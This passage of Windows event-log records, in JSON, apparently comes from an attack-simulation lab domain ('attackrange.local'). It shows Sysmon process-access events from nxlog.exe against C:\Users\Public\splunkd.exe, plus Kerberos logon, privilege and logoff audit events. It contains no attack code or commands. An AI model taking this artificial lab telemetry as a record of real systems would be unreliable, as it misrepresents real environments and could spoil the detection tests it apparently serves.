06:57:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:57:27","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6484,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:57:27.545\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3592\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:57:27.545","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3592","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:57:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:57:28","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6485,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:57:28.546\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3588\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:57:28.546","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3588","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:57:30","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:57:29","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4672,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12548,"OpcodeValue":0,"RecordNumber":220669,"ProcessID":864,"ThreadID":2212,"Channel":"Security","Message":"Special privileges assigned to new logon.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-8400769$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x94972\r\n\r\nPrivileges:\t\tSeSecurityPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege\r\n\t\t\tSeEnableDelegationPrivilege","Category":"Special Logon","Opcode":"Info","SubjectUserSid":"S-1-5-18","SubjectUserName":"WIN-DC-8400769$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x94972","PrivilegeList":"SeSecurityPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege\r\n\t\t\tSeEnableDelegationPrivilege","EventReceivedTime":"2020-08-01 06:57:30","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:57:29","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4624,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":2,"Task":12544,"OpcodeValue":0,"RecordNumber":220670,"ProcessID":864,"ThreadID":2212,"Channel":"Security","Message":"An account was successfully logged on.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-0-0\r\n\tAccount Name:\t\t-\r\n\tAccount Domain:\t\t-\r\n\tLogon ID:\t\t0x0\r\n\r\nLogon Information:\r\n\tLogon Type:\t\t3\r\n\tRestricted Admin Mode:\t-\r\n\tVirtual Account:\t\tNo\r\n\tElevated Token:\t\tYes\r\n\r\nImpersonation Level:\t\tImpersonation\r\n\r\nNew Logon:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-8400769$\r\n\tAccount Domain:\t\tATTACKRANGE.LOCAL\r\n\tLogon ID:\t\t0x94972\r\n\tLinked Logon ID:\t\t0x0\r\n\tNetwork Account Name:\t-\r\n\tNetwork Account Domain:\t-\r\n\tLogon GUID:\t\t{84587115-398E-4BE5-5705-9593D4B595D1}\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x0\r\n\tProcess Name:\t\t-\r\n\r\nNetwork Information:\r\n\tWorkstation Name:\t-\r\n\tSource Network Address:\t::1\r\n\tSource Port:\t\t52697\r\n\r\nDetailed Authentication Information:\r\n\tLogon Process:\t\tKerberos\r\n\tAuthentication Package:\tKerberos\r\n\tTransited Services:\t-\r\n\tPackage Name (NTLM only):\t-\r\n\tKey Length:\t\t0\r\n\r\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\r\n\r\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\r\n\r\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\r\n\r\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\r\n\r\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\r\n\r\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\r\n\r\nThe authentication information fields provide detailed information about this specific logon request.\r\n\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\r\n\t- Transited services indicate which intermediate services have participated in this logon request.\r\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\r\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-0-0","SubjectUserName":"-","SubjectDomainName":"-","SubjectLogonId":"0x0","TargetUserSid":"S-1-5-18","TargetUserName":"WIN-DC-8400769$","TargetDomainName":"ATTACKRANGE.LOCAL","TargetLogonId":"0x94972","LogonType":"3","LogonProcessName":"Kerberos","AuthenticationPackageName":"Kerberos","WorkstationName":"-","LogonGuid":"{84587115-398E-4BE5-5705-9593D4B595D1}","TransmittedServices":"-","LmPackageName":"-","KeyLength":"0","ProcessName":"-","IpAddress":"::1","IpPort":"52697","ImpersonationLevel":"%%1833","RestrictedAdminMode":"-","TargetOutboundUserName":"-","TargetOutboundDomainName":"-","VirtualAccount":"%%1843","TargetLinkedLogonId":"0x0","ElevatedToken":"%%1842","EventReceivedTime":"2020-08-01 06:57:30","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:57:29","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4634,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12545,"OpcodeValue":0,"RecordNumber":220671,"ProcessID":864,"ThreadID":108,"Channel":"Security","Message":"An account was logged off.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-8400769$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x94972\r\n\r\nLogon Type:\t\t\t3\r\n\r\nThis event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.","Category":"Logoff","Opcode":"Info","TargetUserSid":"S-1-5-18","TargetUserName":"WIN-DC-8400769$","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0x94972","LogonType":"3","EventReceivedTime":"2020-08-01 06:57:30","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:57:29","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6486,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:57:29.546\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3592\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:57:29.546","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3592","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:57:30","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:57:30","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6487,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:57:30.546\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3596\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:57:30.546","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3596","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:57:32","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:57:31","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6488,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:57:31.546\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3576\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:57:31.546","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3576","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:57:32","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
